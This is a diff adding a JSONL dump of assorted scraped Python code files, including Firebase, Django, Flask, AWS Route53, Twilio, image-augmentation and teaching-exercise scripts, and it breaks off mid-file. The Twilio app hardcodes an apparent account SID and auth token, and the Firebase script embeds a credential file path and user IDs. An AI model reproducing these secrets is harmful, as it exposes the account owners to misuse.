diff --git "a/1607.jsonl" "b/1607.jsonl" new file mode 100644--- /dev/null +++ "b/1607.jsonl" @@ -0,0 +1,2247 @@ +{"seq_id":"8769043944","text":"import firebase_admin\nfrom firebase_admin import credentials\nfrom firebase_admin import firestore\n\nif not firebase_admin._apps:\n cred = credentials.Certificate(\n '/Users/manishsingh/Documents/Study/meal_entry_python1/rassoi-767af-firebase-adminsdk-q09j7-a66f37f511.json')\n default_app = firebase_admin.initialize_app(cred, name=\"new2\")\n\ndb = firestore.client(default_app)\n\n\n# ,\"qgAmuXBvsRMXpQDUvxS0FraQiQH3\", \"qnxzsG184Gfp17RDnvGdAg6DFu23\"]\nuser_id_list = [\"qgAmuXBvsRMXpQDUvxS0FraQiQH3\"]\n\nfor user_id in user_id_list:\n ingredients = db.collection(u'ingredients').stream()\n print(user_id)\n meal_id_list = []\n for i, doc in enumerate(ingredients):\n\n doc_ref = db.collection(u'ingredients').document(\n doc.id).get().to_dict()\n inged_id = doc.id\n inged_name = doc_ref[\"english\"]\n inged_name_hindi = doc_ref[\"hindi\"]\n inged_img = doc_ref[\"img\"]\n ingred_payload = {\n u'inged_id': inged_id,\n u'english': inged_name,\n u'hindi': inged_name_hindi,\n u'img': inged_img,\n u'recipe_names': [],\n u'user_uid': user_id,\n u\"status\": \"unavailable\",\n u\"meal_count\": 0,\n u\"audit\": 0\n }\n\n doc_name = user_id+inged_id\n db.collection(u'meal_ingred').document(\n doc_name).set(ingred_payload)\n","repo_name":"rassoi/DataManipulation","sub_path":"copydata/copy_ingreds.py","file_name":"copy_ingreds.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"38161724435","text":"from django.urls import path\nfrom django.contrib.auth import views as auth_views\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\nfrom django.contrib import admin\nfrom django.conf.urls import url\n\nfrom clients import views as client_views\nfrom meetings import views as meeting_views\nfrom topics import views as topics_views\nfrom shedules import views as shedules_views\nfrom pdfs.views import PDF\nfrom questionnaires import views as questionnaires_views\nfrom questions import views as question_views\n\nurlpatterns = [\n\n #Admin\n url(r'^admin/', admin.site.urls),\n\n #Login\n url(r'^$', auth_views.LoginView.as_view(template_name='login.html'), name='login'),\n url(r'^logout/$', auth_views.LogoutView.as_view(next_page='login'), name='logout'),\n\n #Users\n path('perfil/', client_views.client_show, name='client_show'),\n path('novo_usuario', client_views.new_client, name='client_new'),\n path('editar_perfil/', client_views.client_update, name='client_edit'),\n path('excluir_perfil/', client_views.client_delete, name='client_delete'),\n path('lista_de_usuarios/', client_views.list_users, name='client_list'),\n\n #Meetings\n path('reunioes/', meeting_views.list_meeting, name='meeting_list'),\n path('detalhes_reuniao/', meeting_views.show_meeting, name='meeting_show'),\n path('nova_reuniao/', meeting_views.new_meeting, name='meeting_new'),\n path('editar_reuniao/', meeting_views.edit_meeting, name='meeting_edit'),\n path('excluir_reuniao/', meeting_views.delete_meeting, name='meeting_delete'),\n\n #Topic\n path('novo_topico/', topics_views.new_topic, name='topic_new'),\n path('excluir_topico//', topics_views.delete_topic, name='topic_delete'),\n\n #Shedule\n path('nova_pauta/', shedules_views.new_shedule, name='shedule_new'),\n path('editar_pauta//', shedules_views.edit_shedule, name='shedule_edit'),\n path('excluir_pauta//', shedules_views.delete_shedule, name='shedule_delete'),\n path('detalhes_pauta//', shedules_views.show_shedule, name='shedule_show'),\n\n #Quiz\n path('novo_questionario/', questionnaires_views.new_quiz, name='quiz_new'),\n path('editar_questionario//', questionnaires_views.edit_quiz, name='quiz_edit'),\n path('excluir_questionario//', questionnaires_views.delete_quiz, name='quiz_delete'),\n\n #Question\n path('ver_questionario//', question_views.show_question,\n name='quiz_show'),\n path('editar_pergunta///', question_views.edit_question,\n name='question_edit'),\n path('deletar_pergunta///', question_views.delete_question,\n name='question_delete'),\n path('visualizar_questionario//', question_views.respond_question,\n name='question_show'),\n path('ver_respostas//', question_views.question_list,\n name='question_list'),\n\n #PDF\n path('pdf/', PDF.as_view(), name='pdf_show'),\n]\n\n\nurlpatterns += staticfiles_urlpatterns()","repo_name":"FGAProjects/Projeto-Grata","sub_path":"projeto-grata/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"6240909374","text":"from flask import Flask, send_from_directory, request, render_template\nimport os\nfrom bloom560m import Bloom560m\n\napp = Flask(__name__)\n\n@app.route(\"/\")\ndef index():\n return render_template('index.html', result=\"\")\n\n\n@app.route(\"/bloom560m/request\", methods=['POST', 'GET'])\ndef bloom560m_request():\n if request.method != 'POST':\n return render_template('bloom560m.html')\n\n output = {\n 'search_mode' : request.form['search_mode'],\n 'result_length' : int(request.form['result_length']),\n 'request_string' : request.form['request_string'],\n 'result' : ''\n }\n\n if request.form['request_string'] == '':\n return render_template('bloom560m.html')\n\n try:\n if output['search_mode'] == \"BEAM_SEARCH\":\n model = Bloom560m(output['request_string'], output['result_length'])\n output['result'] += model.beam_search()\n print(output['result'])\n elif output['search_mode'] == \"GREEDY_SEARCH\":\n model = Bloom560m(output['request_string'], output['result_length'])\n output['result'] += model.greedy_search()\n print(output['result'])\n elif output['search_mode'] == \"SAMPLING_TOP_SEARCH\":\n model = Bloom560m(output['request_string'], output['result_length'])\n output['result'] += model.sampling_top()\n print(output['result'])\n else:\n return render_template('bloom560m.html', res=\"WRONG INPUT\")\n \n output['result'] = output['result'].split('\\n')\n except Exception as ex:\n output['request_string'] = str(ex)\n\n return render_template('bloom560m.html', **output)\n\n\nif __name__ == \"__main__\":\n app.run()\n","repo_name":"JokerSamStrew/bloom-test","sub_path":"src/flaskapp.py","file_name":"flaskapp.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"17235159958","text":"import numpy as np\nimport pandas as pd\nfrom sklearn import preprocessing\n\nimport my_utils\n\npath_to_project = my_utils.path_to_project\n\n\ndef load_fifa2018_stat():\n data = pd.read_csv(path_to_project + \"Datasets/FIFA 2018 Statistics.csv\")\n\n le = preprocessing.LabelEncoder()\n y = (data['Man of the Match'] == \"Yes\") # Convert from string \"Yes\"/\"No\" to binary\n y = le.fit_transform(y)\n feature_names = [i for i in data.columns if data[i].dtype in [np.int64, np.int64]]\n X = data[feature_names]\n\n return X, y, feature_names\n\n\nif __name__ == \"__main__\":\n load_fifa2018_stat()\n","repo_name":"VladisStep/VKR_explanation_model","sub_path":"Global/Test_dataset/data_football.py","file_name":"data_football.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"74695738456","text":"from __future__ import print_function\nfrom __future__ import division\nfrom __future__ import absolute_import\n\nimport unittest\n\nfrom dashboard import change_internal_only\nfrom dashboard.common import testing_common\nfrom dashboard.models import anomaly\nfrom dashboard.models import graph_data\n\n\nclass ChangeInternalOnlyTest(testing_common.TestCase):\n\n def testUpdateBots(self):\n testing_common.AddTests(\n ['ChromiumPerf', 'ChromiumGPU'],\n ['win7', 'mac'],\n {'scrolling': {'first_paint': {}}})\n for key in graph_data.TestMetadata.query().fetch(keys_only=True):\n anomaly.Anomaly(\n test=key, start_revision=15001, end_revision=15005,\n median_before_anomaly=100, median_after_anomaly=200).put()\n\n internal_master_bots = [\n ('ChromiumPerf', 'win7'),\n ('ChromiumGPU', 'mac'),\n ]\n change_internal_only.UpdateBots(internal_master_bots, True)\n self.PatchDatastoreHooksRequest()\n self.ExecuteDeferredTasks(change_internal_only.QUEUE_NAME)\n\n for bot in graph_data.Bot.query().fetch():\n master_name = bot.key.parent().id()\n bot_name = bot.key.id()\n expected = (master_name, bot_name) in internal_master_bots\n self.assertEqual(expected, bot.internal_only)\n\n query = graph_data.TestMetadata.query(\n graph_data.TestMetadata.master_name == master_name,\n graph_data.TestMetadata.bot_name == bot_name)\n for test in query.fetch():\n self.assertEqual(expected, test.internal_only)\n\n anomalies, _, _ = anomaly.Anomaly.QueryAsync(\n test=test.test_path).get_result()\n for alert in anomalies:\n self.assertEqual(expected, alert.internal_only)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"endlessm/chromium-browser","sub_path":"third_party/catapult/dashboard/dashboard/change_internal_only_test.py","file_name":"change_internal_only_test.py","file_ext":"py","file_size_in_byte":1734,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"68"} +{"seq_id":"43729265785","text":"import numpy as np\nimport scipy.linalg as al\nimport math\nfrom linesearch import f, df, hessian\nfrom plot import plot3d\n\ndef model(x1, x2, p1=0, p2=0):\n g = df(x1, x2)\n B = hessian()\n return f(x1, x2) + g[0]*p1 + g[1]*p2 + 0.5*(B[0][0]*p1**2 + B[1][1]*p2**2)\n\ndef func(x1, x2, p1=0, p2=0):\n return f(x1+p1, x2+p2)\n\ndef cauchy_point(x1, x2, delta, returnVec=False):\n g = df(x1, x2)\n gvec = np.array([[g[0], g[1]]])\n B = hessian()\n check = (gvec @ B @ gvec.transpose()).flatten()[0]\n print('cauchy_check for tau: {}'.format(check))\n if check <= 0:\n tau = 1\n else:\n tau = min(al.norm(g)**3/(delta*check), 1)\n factor = (tau*delta/al.norm(g))\n\n if returnVec:\n return np.array([factor*g[0], factor*g[1]])\n else:\n return factor*g[0], factor*g[1]\n\ndef dogleg(x1, x2, delta):\n def quadratic(t, a, b, c):\n return a*t**2 + b*t + c\n\n def quadprime(t, a, b):\n return 2*a*t + b\n\n def newton_raphson(a, b, c):\n t = 0.1\n for i in range(100):\n told = t\n t = t - (quadratic(t, a, b, c)/quadprime(t, a, b))\n if (abs(told - t)) < 0.0001 :\n break\n print(abs(told - t))\n return t\n\n def pb(x1, x2):\n g = df(x1, x2)\n B = hessian()\n return (al.inv(B) @ np.array([[g[0], g[1]]]).transpose()).transpose().flatten()\n\n def pu(x1, x2, delta):\n return cauchy_point(x1, x2, delta, True)\n\n def tau(lu, lb, delta):\n\n # solving ||pu+(t-1)(pb-pu)||**2 = delta**2\n pc = lb - lu\n pa = 2*lu - lb\n\n # quadratic terms\n a = pc[0]**2+pc[1]**2\n b = 2*(pc[1]*pa[1]+pc[0]*pa[0])\n c = pa[0]**2 + pa[1]**2 - delta**2\n\n print(a, b, c)\n\n #solve quadratic to find t\n return newton_raphson(a, b, c)\n\n def ptau(x1, x2, delta):\n lb = pb(x1, x2)\n lu = pu(x1, x2, delta)\n\n print(lb)\n print(lu)\n\n if al.norm(lu) >= delta:\n g = df(x1, x2)\n gvec = np.array([[g[0], g[1]]])\n return ((delta/al.norm(g)**2)*gvec).flatten()\n\n if al.norm(lb) <= delta:\n return lb\n\n t = tau(lu, lb, delta)\n\n if t >= 0 and t <= 1:\n return t*lu\n else:\n return lu + (t - 1)*(lb - lu)\n\n return ptau(x1, x2, delta)\n\n\ndef iterate(getp, num_iter):\n points = []\n deltas = []\n\n max_delta = 1.0 # decide this?\n delta = 0.5\n nu = 0.15\n\n x = (0, 0)\n points.append(x)\n deltas.append(delta)\n\n for i in range(num_iter):\n #obtain pk\n p = getp(*x, delta)\n print('p: {}'.format(p))\n\n #obtain rhok\n rho = (func(*x) - func(*x, *p))/(model(*x)- model(*x, *p))\n print('rho: {}'.format(rho))\n\n print('before delta: {}'.format(delta))\n #handles the trust region\n if rho < 0.25:\n delta = delta*0.25\n else:\n if rho > 0.75 and al.norm(p) == delta:\n delta = min(2*delta, max_delta)\n print('Increase size')\n else:\n delta = delta\n\n print('after delta: {}'.format(delta))\n\n print('x: {}'.format(x))\n #handles the update\n if rho > nu:\n x = (x[0] + p[0], x[1] + p[1])\n else:\n x = x\n\n points.append(x)\n deltas.append(delta)\n\n print('x: {}'.format(x))\n\n return points, deltas\n\ndef plot(points, deltas):\n import matplotlib.pyplot as plt\n\n ax = plt.gca()\n\n def Circle(x, y, r):\n circle = plt.Circle((x, y), radius=r, fill=False)\n ax.add_patch(circle)\n\n xs = []\n ys = []\n c = []\n for point, delta in zip(points, deltas):\n xs.append(point[0])\n ys.append(point[1])\n Circle(float(point[0]), float(point[1]), delta)\n\n ax.plot(np.array(xs), np.array(ys), \"ro--\")\n plt.axis('scaled')\n plt.show()\n\nif __name__ == \"__main__\":\n points, deltas = iterate(dogleg, 29)\n plot(points, deltas)\n","repo_name":"sachag678/Reinforcement_learning","sub_path":"trust-region-optimization/tro.py","file_name":"tro.py","file_ext":"py","file_size_in_byte":3999,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"68"} +{"seq_id":"23898809185","text":"import subprocess\nimport csv\nimport sys\nimport getopt\nimport json\nimport boto3\n\nawsProfile = ''\naccountName = ''\n\ndef parseArguments(argv):\n global awsProfile\n global accountName\n\n opts, args = getopt.getopt(argv,\"hn:p:\", [\"help\", \"name=\", \"profile=\"])\n\n for opt, arg in opts:\n if opt in (\"-h\", \"--help\"):\n print('get_all_aws_hosted_zone_records.py --profile default --name old_account')\n sys.exit()\n elif opt in (\"-p\", \"--profile\"):\n awsProfile = arg\n elif opt in (\"-n\", \"--name\"):\n accountName = arg\n \n if not awsProfile:\n print(\"Must pass an AWS profile name to use this script\")\n sys.exit(1)\n if not accountName:\n print(\"Must pass a name for the AWS account to use this script\")\n sys.exit(1)\n\n print(f'AWS profile set to \"{awsProfile}\"')\n print(f'Account name set to \"{accountName}\"')\n\nparseArguments(sys.argv[1:])\n\nhostedZonesFile = open(f\"./files/aws/tmp/{accountName}_hosted_zones.json\", 'w')\n\n\nsession = boto3.session.Session(profile_name=awsProfile)\nroute53 = session.client('route53')\nroute53_paginator = route53.get_paginator('list_hosted_zones')\nresponse_iterator = route53_paginator.paginate(\n PaginationConfig={\n 'MaxItems': 1000\n }\n)\n\nhostedZonesAccumulator = []\n\nfor page in response_iterator:\n hostedZonesAccumulator.extend(page['HostedZones'])\n\nhostedZonesFile.write(json.dumps(hostedZonesAccumulator, indent=4))\nhostedZonesFile.close()\n\nhostedZonesFile = open(f\"./files/aws/tmp/{accountName}_hosted_zones.json\", 'r')\ndnsRecordsFile = open(f\"./files/aws/{accountName}_dns_records.csv\", 'w', newline=\"\")\ndnsRecordsWriter = csv.writer(dnsRecordsFile, quoting=csv.QUOTE_ALL)\n\nhostedZoneCount = 0\n\nhostedZonesJson = json.load(hostedZonesFile)\nfor zone in hostedZonesJson:\n hostedZoneCount += 1\n hostedZoneId = zone.get('Id')[12:].strip()\n hostedZoneName = zone.get('Name')\n print(f\"Processing {hostedZoneId}\")\n currentZoneFile = open(\"./files/aws/tmp/current_zone_records.json\", 'wb')\n awsCall = subprocess.Popen(['aws', '--profile', awsProfile, '--output', 'json', 'route53', 'list-resource-record-sets', '--hosted-zone-id', hostedZoneId], stdout=subprocess.PIPE)\n filterCall = subprocess.Popen(['jq', '-r', '.\"ResourceRecordSets\"'], stdin=awsCall.stdout, stdout=currentZoneFile)\n filterCall.communicate()\n currentZoneFile.close()\n \n currentZoneFile = open(\"./files/aws/tmp/current_zone_records.json\", 'r')\n currentZoneJson = json.load(currentZoneFile)\n for record in currentZoneJson:\n recordName = record.get('Name', \"N/A\")\n recordType = record.get('Type', \"N/A\")\n recordTTL = record.get('TTL', \"N/A\")\n recordValues = record.get('ResourceRecords',\"N/A\")\n recordAlias = record.get('AliasTarget', \"N/A\")\n dnsRecordsWriter.writerow([accountName, hostedZoneName, hostedZoneId, recordName, recordType, recordTTL, recordValues, recordAlias])\n currentZoneFile.close()\n\nprint(f\"{accountName} has {hostedZoneCount} hosted zones\")\n\nhostedZonesFile.close()\ndnsRecordsFile.close()\n","repo_name":"roerjo/domain-monitoring","sub_path":"get_all_aws_hosted_zone_records.py","file_name":"get_all_aws_hosted_zone_records.py","file_ext":"py","file_size_in_byte":3109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"39275096668","text":"#!python\n# -*- coding: latin-1 -*-\n\"\"\"\n(c) by nobisoft 2016-\n\"\"\"\n\n\n# Imports\n## Standard\n## Contributed\n## nobi\nfrom ObserverPattern import Observer\nfrom PausableObservable import PausableObservable\n\n\n\n# Constants\nAspectName = 'aspect'\nMessageOne = 'no pausing'\nMessageTwo = 'paused on object 1'\nMessageThree = 'paused on class'\n\n\n\n# Observable class\nclass PauseableObservableObject(PausableObservable):\n def __init__(self, identifier):\n super(PauseableObservableObject, self).__init__([AspectName])\n self.identifier = identifier\n self.message = ''\n \n def doChange(self, msg):\n self.message = msg\n self.changedAspect(AspectName)\n \n def getMessage(self):\n return('Observable %s changed (%s)' % (self.identifier, self.message))\n\n\n\n# Observer class\nclass ObserverObject(Observer):\n def updateAspect(self, observable, aspect):\n Observer.updateAspect(self, observable, aspect)\n print(observable.getMessage())\n\n\n\n# Globals\nobservableObject1 = PauseableObservableObject('1')\nobservableObject2 = PauseableObservableObject('2')\nobserverObject = ObserverObject()\n\n\n# Executable Script\nif __name__ == \"__main__\":\n observableObject1.addObserverForAspect(observerObject, AspectName)\n observableObject2.addObserverForAspect(observerObject, AspectName)\n observableObject1.doChange(MessageOne)\n observableObject2.doChange(MessageOne)\n print('Pausing updates from observable object 1')\n PausableObservable.pauseUpdates(observableObject1, None, None)\n observableObject1.doChange(MessageTwo)\n observableObject2.doChange(MessageTwo)\n PausableObservable.resumeUpdates(observableObject1, None, None)\n print('Pausing a class')\n PausableObservable.pauseUpdates(PauseableObservableObject, None, None)\n observableObject1.doChange(MessageThree)\n observableObject2.doChange(MessageThree)\n PausableObservable.resumeUpdates(PauseableObservableObject, None, None)\n print('No more pausing')\n observableObject1.doChange(MessageOne)\n observableObject2.doChange(MessageOne)\n","repo_name":"virtualnobi/PausableObserverPattern","sub_path":"PO.py","file_name":"PO.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"16462904056","text":"import albumentations as A\nfrom albumentations.pytorch import ToTensorV2\nimport cv2\n\ntrain_transform = A.Compose([\n # 非破坏性转换\n A.OneOf([\n A.VerticalFlip(p=0.5),\n A.HorizontalFlip(p=0.5),\n A.RandomRotate90(p=0.5),\n A.Transpose(p=0.5), \n ], p=0.7),\n # 非刚体转换\n A.OneOf([\n A.ElasticTransform(p=0.5, border_mode=cv2.BORDER_REFLECT101, alpha_affine=5),\n A.GridDistortion(p=0.5),\n A.OpticalDistortion(p=0.5, distort_limit=2, shift_limit=0.5),\n A.ShiftScaleRotate(p=0.5, scale_limit=0.2, rotate_limit=45, border_mode=cv2.BORDER_REFLECT101),\n ], p=0.7),\n # Dropout & Shuffle\n # A.OneOf(\n # [\n # A.RandomGridShuffle(p=0.5),\n # A.CoarseDropout(p=0.5),\n # ], p=0.7),\n \n # Add occasion blur\n A.OneOf([A.GaussianBlur(p=0.5), A.GaussNoise(p=0.5), A.IAAAdditiveGaussianNoise(p=0.5)], p=0.7),\n\n A.Normalize(mean=(0.485, 0.456, 0.406, 0.45), std=(0.229, 0.224, 0.225, 0.225)),\n ToTensorV2(),\n])\n\nval_transform = A.Compose([\n # A.Resize(256, 256),\n A.Normalize(mean=(0.485, 0.456, 0.406, 0.45), std=(0.229, 0.224, 0.225, 0.225)),\n ToTensorV2(),\n])","repo_name":"liu8526/project","sub_path":"dataset/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"29078826459","text":"#16/2/2017\n\nimport copy\n\nclass time:\n hours=0\n minutes=0\n seconds=0\n\n def __init__(self,hours=0,minutes=0,seconds=0):\n self.hours = hours\n self.minutes = minutes\n self.seconds = seconds\n \n def input_values(self):\n print(\"Enter time (hh:mm:ss) : \")\n \n self.hours = int(input(\"Enter hours : \"))\n self.minutes = int(input(\"Enter Minutes : \"))\n self.seconds = int(input(\"Enter seconds : \"))\n \n def print_values(self):\n print(self.hours, ':', self.minutes, ':', self.seconds)\n\n def __add__(self, other):\n self.hours = self.hours + other.hours\n if(self.hours >= 24):\n self.hours -= 24\n self.minutes = self.minutes + other.minutes\n if(self.minutes >= 60):\n self.minutes -= 60\n self.hours += 1\n self.seconds = self.seconds + other.seconds\n if(self.seconds >= 60):\n self.seconds -= 60\n self.minutes += 1\n return time(self.hours, self.minutes, self.seconds)\n\n def __sub__(self, other,t3):\n t3.hours = t3.hours - other.hours\n if(t3.hours < 24):\n t3.hours += 24\n t3.minutes = t3.minutes - other.minutes\n if(t3.minutes < 0):\n t3.minutes += 60\n t3.hours -= 1\n t3.seconds = t3.seconds - other.seconds\n if(t3.seconds < 0):\n t3.seconds += 60\n t3.minutes -= 1\n return time(t3.hours, t3.minutes, t3.seconds)\n\n def __str__(self):\n return \"{0}:{1}:{2}\".format(self.hours,self.minutes,self.seconds)\n\nt1=time()\nt2=time()\n\nt1.input_values()\nt1.print_values()\n\nt2.input_values()\nt2.print_values()\n\nt3=copy.copy(t1)\n\nprint(\"t1+t2\",time.__add__(t1,t2))\nprint(\"t1-t2=\",time.__sub__(t1,t2,t3))","repo_name":"rajataneja101/Python-Lab","sub_path":"alternates/classes/time.py","file_name":"time.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"28789869404","text":"# 典型90-044\n# PyPy only\n# 先頭・末尾使うやつはdeque使ってごり押し\nimport sys\nimport collections\n\nrm = lambda: map(int, sys.stdin.readline().split())\nrl = lambda: list(map(int, sys.stdin.readline().split()))\n\nn, q = rm()\nal = rl()\nd = collections.deque(al)\nfor _ in range(q):\n t, x, y = rm()\n if t == 1:\n d[x-1], d[y-1] = d[y-1], d[x-1]\n elif t == 2:\n d.appendleft(d.pop())\n elif t == 3:\n print(d[x-1])\n","repo_name":"calliope-pro/algorithm","sub_path":"problems/典型90/044.py","file_name":"044.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"11050363064","text":"'''\nfrom twilio.rest import Client\n\n\n# Your Account Sid and Auth Token from twilio.com/console\naccount_sid = 'AC6dde4f2c5dec01ff9c5c650567f2e811'\nauth_token = '5f5708895de328cd555d6184a5e539b1'\nclient = Client(account_sid, auth_token)\n\ncall = client.calls.create(\n to='+17472558546',\n from_='+15052787618',\n url=\"https://demo.twilio.com/welcome/voice/\",\n)\n\nprint(call.sid)\n'''\nimport os\nfrom flask import Flask\nfrom flask import jsonify\nfrom flask import render_template\nfrom flask import request\nfrom flask import url_for\n\nfrom twilio.twiml.voice_response import VoiceResponse, Say\nfrom twilio.rest import Client\n\nTWILIO_ACCOUNT_SID = \"AC6dde4f2c5dec01ff9c5c650567f2e811\"\nTWILIO_AUTH_TOKEN = \"5f5708895de328cd555d6184a5e539b1\"\nTWILIO_CALLER_ID = \"+15052787618\"\nTWILIO_APP_SID = \"AP7c382977057944c9bcb2367679f8fabb\"\n\n# Declare and configure application\napp = Flask(__name__, static_url_path='/static')\napp.config.from_pyfile('local_settings.py')\n\n\n# Route for Click to Call demo page.\n@app.route('/')\ndef index():\n return jsonify({'Hello': 'World!'})\n\n\n\n# Voice Request URL\n@app.route('/call', methods=['POST'])\ndef call():\n # Get phone number we need to call\n phone_number = '+17472558546'\n try:\n twilio_client = Client(TWILIO_ACCOUNT_SID, TWILIO_AUTH_TOKEN)\n\n except Exception as e:\n msg = 'Missing configuration variable: {0}'.format(e)\n return jsonify({'error': msg})\n\n try:\n twilio_client.calls.create(from_=TWILIO_CALLER_ID,\n to=phone_number,\n url='https://api.twilio.com/2010-04-01/Accounts/AC6dde4f2c5dec01ff9c5c650567f2e811/Calls')\n #my_response = VoiceResponse()\n #my_response.dial()\n #my_response.say(\"We've been notified of a call. Are you OK? Say Yes if you are. With other response, we will contact emergency medical services for immediate support.\",\n # voice='woman', language='en-US', loop = 3)\n\n #return str(my_response)\n\n except Exception as e:\n app.logger.error(e)\n return jsonify({'error': str(e)})\n\n\n@app.route('/outbound', methods=['POST'])\ndef outbound():\n my_response = VoiceResponse()\n\n my_response.say(\"Thank you for contacting checking in. We have notified emergency medical services\",\n voice='alice')\n # Uncomment this code and replace the number with the number you want\n # your customers to call.\n return str(my_response)\n\n\nif __name__ == '__main__':\n port = int(os.environ.get(\"PORT\", 5000))\n if port == 5000:\n debug = True\n app.run(host='0.0.0.0', port=port)\n\n\n","repo_name":"htn2018-bchiui/alertifyTwilio","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"70325907096","text":"\r\nprint(\"**********contar numeros impares**************\")\r\n#contar numeros impares\r\nLn_numero = []\r\n\r\nLn_rango = int(input((\"ingrese el rango de numeros de la lista:\")))\r\nfor indi in range(Ln_rango):\r\n Ln_valor = int(input(\"ingrese valores numericos:\"))\r\n Ln_numero.append(Ln_valor)\r\n\r\nLn_contador_par = 0\r\nLn_contador_impar = 0\r\n\r\nfor indice in Ln_numero:\r\n if (indice % 2 == 0):\r\n Ln_contador_par += 1\r\n else:\r\n Ln_contador_impar += 1\r\nprint(\" \")\r\nprint(f\"los cantidad de numeros pares son: {Ln_contador_par}\");\r\nprint(\" \")\r\nprint(f\"los cantidad de numeros impares son: {Ln_contador_impar}\");\r\n\r\nprint(\" \")\r\nprint(\"**********Orden inverso**************\")\r\nprint(\" \")\r\n#Orden inverso: Escribe un programa que tome una lista de números y la imprima en orden inverso.\r\nLn_rango = int(input((\"ingrese el rango de numeros de la lista:\")))\r\nLn_lista_num = []\r\n\r\nfor indi in range(Ln_rango):\r\n Ln_valor = int(input(\"ingrese los valores de la lista:\"))\r\n Ln_lista_num.append(Ln_valor)\r\n\r\n#imprimir en orden inverso con la funcion reversed\r\nprint(\"los valores seran mostrados de manera inversa\")\r\nfor indice in reversed(Ln_lista_num):\r\n print(indice)\r\n\r\n\r\nprint(\" \")\r\nprint(\"********** Ordenamiento de una lista **************\")\r\nprint(\" \")\r\n#Ordenamiento de una lista: Escribe un programa que ordene una lista de números ingresada por el usuario de forma ascendente o descendente.\r\nLn_rango = int(input((\"ingrese el rango de numeros de la lista:\")))\r\nLn_list_num = []\r\n\r\nfor indi in range(Ln_rango):\r\n Ln_valor = int(input(\"ingrese los valores de la lista:\"))\r\n Ln_list_num.append(Ln_valor);\r\n\r\nlength = len(Ln_list_num) -1\r\n#metodo burbuja\r\n#Recorrer toda la lista.\r\nfor indice in range(0, length):\r\n #Ordenar los elementos de la lista\r\n for Ln_ind in range(0,length):\r\n if (Ln_list_num[Ln_ind] > Ln_list_num[Ln_ind +1]):\r\n Ln_temporal= Ln_list_num[Ln_ind];\r\n Ln_list_num[Ln_ind] = Ln_list_num[Ln_ind + 1]\r\n Ln_list_num[Ln_ind + 1] = Ln_temporal\r\n\r\nprint('la lista ha sido ordenada exitodamente')\r\n#Imprimir resultados\r\nprint(Ln_list_num)\r\n\r\n\r\n\r\nprint(\" \")\r\nprint(\"********** Búsqueda en una lista **************\")\r\nprint(\" \")\r\n#Búsqueda en una lista: Escribe un programa que busque un elemento específico en una lista ingresada por el usuario y muestre su posición.\r\nLn_rango = int(input((\"ingrese el rango de numeros de la lista:\")))\r\nLn_list_num = []\r\nLn_posicion = -1\r\nLn_indicador =0\r\nfor indi in range(Ln_rango):\r\n Ln_valor = int(input(\"ingrese los valores de la lista:\"))\r\n Ln_list_num.append(Ln_valor);\r\n\r\nLn_buscar = int(input(\"Ingrese el valor que desea buscar:\"));\r\n\r\nfor indi in range(len(Ln_list_num)):\r\n\r\n if (Ln_list_num[Ln_indicador] == Ln_buscar):\r\n Ln_posicion = Ln_indicador\r\n print(f\"el valor {Ln_buscar} se encuentra en la posicion {Ln_posicion}\")\r\n #variable indicador\r\n Ln_indicador +=1\r\n\r\nif (Ln_posicion == -1):\r\n print(f\"el valor {Ln_buscar} no se encuentra establecida en la lista\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"freddyandreszambrano/PYTHON---Manejo-de-archivos","sub_path":"EXAMEN_PRACTICA_FAZQ.py","file_name":"EXAMEN_PRACTICA_FAZQ.py","file_ext":"py","file_size_in_byte":3055,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"74949677657","text":"import os\nimport datetime\n\ndef convert_to_bytes(size):\n # 将大小转换为字节数\n kb_size = int(float(size) * 1024)\n return kb_size * 1024\n\ndef split_log_by_size(log_path, output_path, size, log_name):\n # 将大小转换为字节数\n size_in_bytes = convert_to_bytes(size)\n\n # 获取当前日期\n current_date = datetime.datetime.now().date()\n\n # 构造切割日期\n split_date = current_date.strftime(\"%Y-%m-%d\")\n\n # 构造切割后的文件名\n file_name, file_ext = os.path.splitext(os.path.basename(log_path))\n new_file_name = os.path.join(output_path, f\"{split_date}_{log_name}_part1{file_ext}\")\n\n with open(log_path, 'rb') as file:\n chunk = file.read(size_in_bytes)\n\n # 判断第一个切片的大小是否满足切割标准\n if len(chunk) < size_in_bytes:\n print(f\"{log_name} 日志大小小于切割标准\")\n return\n\n part_num = 1\n\n while True:\n with open(new_file_name, 'wb') as part_file:\n part_file.write(chunk)\n\n part_num += 1\n new_file_name = os.path.join(output_path, f\"{split_date}_{log_name}_part{part_num}{file_ext}\")\n\n chunk = file.read(size_in_bytes)\n\n if not chunk:\n break\n\n # 清空原日志文件\n open(log_path, 'w').close()\n\n # 输出日志切割完成的信息\n print(f\"{log_name} 日志切割完成\")\n\n# 